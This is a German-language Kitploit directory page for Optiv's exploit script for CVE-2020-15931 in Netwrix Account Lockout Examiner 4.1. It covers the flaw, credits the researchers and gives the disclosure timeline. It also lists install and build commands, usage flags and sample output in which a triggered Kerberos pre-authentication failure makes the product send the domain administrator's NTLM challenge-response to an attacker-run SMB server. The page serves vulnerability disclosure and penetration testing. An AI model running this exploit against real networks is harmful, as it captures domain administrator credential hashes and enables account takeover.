Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-15931 — Netwrix Account Lockout Examiner 4.1 Sicherheitslücke bei der Offenlegung von Anmeldeinformationen des Domänenadministrator-Kontos | Kitploit
Tools/GitHubGitHub/optiv/cve-2020-15931
SchwachstellenanalyseExploitationInformationsbeschaffungPenetrationstestsRed Teaming
GitHuboptiv/cve-2020-15931

CVE-2020-15931

Netwrix Account Lockout Examiner 4.1 Sicherheitslücke bei der Offenlegung von Anmeldeinformationen des Domänenadministrator-Kontos

Repository anzeigen
285vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-15931

Netwrix Account Lockout Examiner 4.1 – Schwachstelle zur Offenlegung von Anmeldeinformationen des Domänenadministrator-Kontos

Übersicht über die Schwachstelle

Netwrix Account Lockout Examiner (ALE) vor Version 5.1 ermöglicht es einem nicht authentifizierten, entfernten Angreifer, eine Verbindung zu einem vom Angreifer kontrollierten System auszulösen und die NTLMv1/v2-Challenge-Response eines Kontos mit Domänenadministrator-Berechtigungen abzufangen. Das Domänenadministrator-Konto wäre bereits, wie für die Installation erforderlich, mit dem Produkt konfiguriert. Ein Angreifer kann dies ausnutzen, indem er auf einem Domänencontroller ein einzelnes Ereignis „Kerberos Pre-Authentication Failed“ (Event ID 4771) erzeugt.

Weitere Details zu dieser Schwachstelle finden Sie im folgenden Blog

image

Credits

Die Schwachstelle wurde von Robert Surace (@robsauce) und Daniel Min (@bigb0ss), Optiv Security Consultants, bei der Durchführung einer Sicherheitsbewertung in-the-wild entdeckt. Nach der Identifizierung von CVE-2020-15931 kontaktierte Optiv umgehend Netwrix, um den identifizierten Fehler verantwortungsvoll zu melden.

Zeitleiste der Offenlegung der Schwachstelle

    1. Juni 2020 – Schwachstelle von Optiv entdeckt
    1. Juni 2020 – Von Optiv an den Hersteller gemeldet
    1. Juli 2020 – Hersteller bestätigte das Problem und stimmte der Veröffentlichung der korrigierten Version zu
    1. Juli 2020 – An die CNA (MITRE Corporation) gemeldet
    1. Juli 2020 – Hersteller veröffentlichte die korrigierte Version des Netwrix Account Lockout Examiner 5.1
    1. Juli 2020 – CVE-2020-15931 von der CNA (MITRE Corporation) zugewiesen
    1. August 2020 – Öffentlich bekannt gegeben
    1. Oktober 2020 – Basis-Score 7.5 (Hoch) von der NVD (National Vulnerability Database) zugewiesen

Exploit-Skript

Installation

Das Exploit-Skript wurde in golang entwickelt. Installieren Sie die folgenden Abhängigkeiten:

root@kitploit:~
go get github.com/fatih/color
go get github.com/ropnop/gokrb5/client
go get github.com/ropnop/gokrb5/config

Es verwendet außerdem die smbserver.py von Impacket.

root@kitploit:~
pip install impacket

Laden Sie schließlich das Exploit-Skript herunter und kompilieren Sie es.

root@kitploit:~
git clone https://github.com/optiv/CVE-2020-15931
go build cve-2020-15931.go

Verwendung

root@kitploit:~
$  ./cve-2020-15931

     _______      ________    ___   ___ ___   ___        __ _____ ___ ____  __ 
    / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | ____/ _ \___ \/_ |
   | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
   | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
   | |____   \  /  | |____    / /_| |_| / /_| |_| |      | |___) | / /___) || |
    \_____|   \/   |______|  |____|\___/____|\___/       |_|____/ /_/|____/ |_|
                                                         [robSauce & bigb0ss]  v1.0

   [+] Netwrix Account Lockout Examiner 4.1 Exploit Script

 
    Required:
    -d            Domain name
    -dc           Domain controller 
    -u            Valid username 
    
    Optional:
    -h            Print this help menu

    Example:
    ./cve-2020-15931 -d target.com -dc 10.10.0.2 -u jsmith

Exploit

(Hinweis: Zum Zeitpunkt der Erstellung dieses Dokuments kann dieser Angriff nur über einen blindbasierten Angriff identifiziert werden. Dies liegt daran, dass es schwierig ist festzustellen, ob die Zielorganisation Netwrix Account Lockout Examiner in ihrem Netzwerk zur Überwachung von Kontoauthentifizierungen einsetzt oder nicht.)

root@kitploit:~
$ ./cve-2020-15931 -d bosslab.com -dc 10.10.0.2 -u b0ss1

     _______      ________    ___   ___ ___   ___        __ _____ ___ ____  __ 
    / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | ____/ _ \___ \/_ |
   | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
   | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
   | |____   \  /  | |____    / /_| |_| / /_| |_| |      | |___) | / /___) || |
    \_____|   \/   |______|  |____|\___/____|\___/       |_|____/ /_/|____/ |_|
                                                         [robSauce & bigb0ss]  v1.0

   [+] Netwrix Account Lockout Examiner 4.1 Exploit Script

[+] DC: 	10.10.0.2
[+] Domain: 	bosslab.com
[+] Username: 	b0ss1
[+] Password: 	wrongPass
[+] Event ID 4771 (Kerberos Pre-Authentication Failed) Triggered!
[+] If vulnerable, you will get a NTLMv1/2 of the Netwrix service account.
[+] SMB Server Started...

Impacket v0.9.22.dev1+20200607.100119.b5c61678 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.0.2,59264)
[*] AUTHENTICATE_MESSAGE(BOSSLAB\Administrator,BOSSLAB-DC01)
[*] User BOSSLAB-DC01\Administrator authenticated successfully
[*] Administrator::BOSSLAB:17dcc32c6eafc48d:f798e7c906eb1b639722614f1417ded1:0101000000000000be18...REDACTED...0000000
[*] Disconnecting Share(1:IPC$)
[*] Closing down connection (10.10.0.2,59264)
[*] Remaining connections []

Referenzen

Netwrix Account Lockout Examiner 5.1
Event ID 4771
Impacket smbserver.py
Gokrb5 Client
CVE-2020-15931

Tool herunterladen